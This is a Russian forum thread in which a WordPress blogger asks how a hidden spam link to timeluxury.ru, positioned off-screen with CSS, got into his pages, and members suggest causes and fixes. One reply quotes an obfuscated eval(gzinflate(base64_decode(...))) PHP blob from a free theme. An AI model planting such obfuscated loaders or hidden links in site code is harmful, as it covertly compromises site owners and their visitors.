Помогите с wordpress ссылка откуда то взялась

12
[Удален]
2165

Мужыки помогите с wordpress'oм, у меня проблема :(

Решил значит я сайт проанализировать через pr-cy.ru а у меня показывает 3 ссылки из них 1 индексируется. Я оболдел что за...

Так вот интексируетс ссылка timeluxury.ru надпись и ведет на этот сайт.

На самом сайте я через исходный код нашел вот такое:

<p style="position:absolute;left:-670px"><a href="http://timeluxury.ru">timeluxury.ru</a></p>

на своем сайте водил мышкой ссылку не нашел, но если я использую функцию поиск по сайту через прафка найти и ввожу там timeluxury.ru то он меня ведет на верх страницы, при этом ничего не выделяя.

Захожу в админ панель в редактор темы, открываю все php файлы и на каждом ищу через поиск timeluxury.ru и нету результатов везде. что делать не пойму, как убрать эту ссылку с сайта. Может как то создатели темы внедрили её, но я хочу убрать её.

находитс строчка со ссылкой вот где:

...левая колонка на сайте...

<!-- end sidebar -->

<div id="content">

<!-- end header -->

<p style="position:absolute;left:-670px"><a href="http://timeluxury.ru">timeluxury.ru</a></p>

<div class="post">(тут уже идёт название материалов...)

Помогите пожалуйста найти эту ссылку и удалить а то ведь не хорошо так :(. ведет кстати на несуществующий сайт.

PromoMsater
На сайте с 11.05.2010
Offline
120
#1

Постучите мне в ICQ - решим проблему.

[Удален]
#2

Вообщем вопрос остается :(. висит ссылка на сайте. При установке темы на другое доменное имя - всё впорядке. Все файлы темы проверены. При смене темы через админ панель - проблема не решается. Значит заразили движек сайта. Получается надо искать что-то на хостинге.

Может кто даст какие советы, в каких директориях какие файлики посмотреть, поискать эту ссылку. И подскажите как могла эта ссылка попасть в мой движек сайта? блог версии 2.9. Что мне делать?

V
На сайте с 24.04.2007
Offline
72
#3

Отключите плагины и посмотрите, может какой-то плагин добавляет. Если нет, то: обновите движок, новую версию качайте с оф.сайта.

Dweep
На сайте с 11.12.2006
Offline
207
#4

Как вариант - движок не заразили, а Вы скачали движок или темплейт сайта с уже встроенной ссылкой.

AM
На сайте с 09.01.2007
Offline
467
#5

Sergiys, Шаблон то небось бесплатно скачали, а ссылочкой поделиться зажали:)

angr
На сайте с 11.05.2006
Offline
413
#6
Dweep:
Вы скачали движок или темплейт сайта с уже встроенной ссылкой

скорее это и есть единственная причина...

Sergiys, скачайте всё на локал и ищите поиском, в исходном коде, свою ссылку (если она не заскриптована конечно...)

Требуется СЕО-Специалист в Кишиневе, в офис. ()
Mad_Man
На сайте с 10.11.2008
Offline
162
#7
angr:
если она не заскриптована конечно...

Каждый блогер желает знать где спрятали eval base64.

Я это к тому, что ссылка либо в футере, либо в функциях темы. Пляски в виде взлома сайта, инфицированного движка и т.д. маловероятны. И почти стопроцентно использовали обфуcкацию.

[Удален]
#8

Ребят вобщем я этот движек ставил не на один домен, но только на этом в коде беспалевная ссылка висит, шаблон чист это я проверил - ни в каком футере, ни в функциях шаблона ничего нету (искал через поиск по слову timeluxury)

Я с wordpress знаком недавно, и вот думаю попробовать обновить версию, я еще никогда не обновлял и вот хочу спросить как оно обновляется, что-нибудь надо сохранять перед этим или не нужно?

спасибо за вашу помощь, форумчяне :)!!!

imho-no
На сайте с 07.04.2008
Offline
186
#9
Sergiys:
и вот хочу спросить как оно обновляется, что-нибудь надо сохранять перед этим или не нужно?

http://yandex.ru/yandsearch?text=%D0%BA%D0%B0%D0%BA+%D0%BF%D1%80%D0%B0%D0%B2%D0%B8%D0%BB%D1%8C%D0%BD%D0%BE+%D0%BE%D0%B1%D0%BD%D0%BE%D0%B2%D0%B8%D1%82%D1%8C+wordpress&lr=1

Я - советский пионер. Надо переводить бабушек через дорогу и Бога - нет. юзаю этот хостинг http://ipipe.ru/?pid=16015 (http://ipipe.ru/?pid=16015). полёт нормальный!
G
На сайте с 01.04.2008
Offline
109
#10
Sergiys:
Ребят вобщем я этот движек ставил не на один домен, но только на этом в коде беспалевная ссылка висит, шаблон чист это я проверил - ни в каком футере, ни в функциях шаблона ничего нету (искал через поиск по слову timeluxury)

Я с wordpress знаком недавно, и вот думаю попробовать обновить версию, я еще никогда не обновлял и вот хочу спросить как оно обновляется, что-нибудь надо сохранять перед этим или не нужно?

спасибо за вашу помощь, форумчяне :)!!!

В файле index.php темы иногда прячут ссылку. Вы тему как проверяли - через админку или ФТП?

Недавно столкнулся с тем. Что закодированы были все без исключения пхп файлы темы. Всего 10 внешних ссылок на каждой странице, по моему жирновато для бесплатной темы. Поудалял все кроме одной, она в functions.php бфла так зверски закодирована, что при вставке расшифрованного кода или удалении зашифрованной части выдавала белый экран на сайте. Приходилось переустанавливать движок.

Кстати, вот этот фрагмент


<?php }

#eval(gzinflate(base64_decode('DdBJkqJAAADA53R3cCjZISb6UMi+CyWClwl2ZacEAV8/k0/I8p123/XnOVRdupTfWfoqOeZvUeZjUX5/yTlrtrMJIZQhSwd0CaXWRbiHtm3aUxCWZgtv6VUJ33cOXA/CMF5dUAhRmo3hFPn7kEaNEUtAIOw7K8R0x85ZNL7e83HgiLbHe83bolE3dSpE5oWXY/zKdB2e+HjTkg8tfwhfsRMlcx/mmSG2p8XL7qZaigOJFDsEDMDacYnBbFN3IxEuradnrr3Tx2fOMZW5abrWIdTqSOI6tl6nobi7WYSl0OvPi6ofQ+UBkl9caWr1LsKVNI1A83jCWmNilLyHq615tmQlZTT9DTGdnZTbQ5myoBUInpkaoqL2Zc2Y9UmCvFccMS2MXURqIGKWYmV/TuhoFsjORL4XXULcfRgTpOuu3JSyEYv8/xl0drHVpl5D5u3U0jnKHf16aWacxqFqks7lxJmvZa33F/PIq8q58NaRJ71TLMaUagbmAr2dj08goTguhmE+P5EJzoi33l6txFvB6f1EsUAN2oh+1kDxrhoUi5FpHi/J3XbkF3nFWkBPsF7Ti5Kcc9vLHlCQhx7SN4hoaor43b+qwkhuGonWXR0aLIO+G8FdVB3DWbLg/PBCmemo2ez48UqBpx5rR6ZWxpPqbyrrkHf+k3sVXXRtAmIiX+8+IkSXVWhsitIUBrfrad+ZAdmhJXs5aX24GvtvAwdoOmK0UrXn2rY2CHhI2OLdD8yoEXgYuQufiJuSuo0BZkuC0rysrYKNIRwyUPm0APwPAbff36+fn58//wA=')));
?>

Вот этот элемент меня засмущал

<?php }

#

Так и не осилил его. В итоге проблема решилась предельно простым путем :)

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий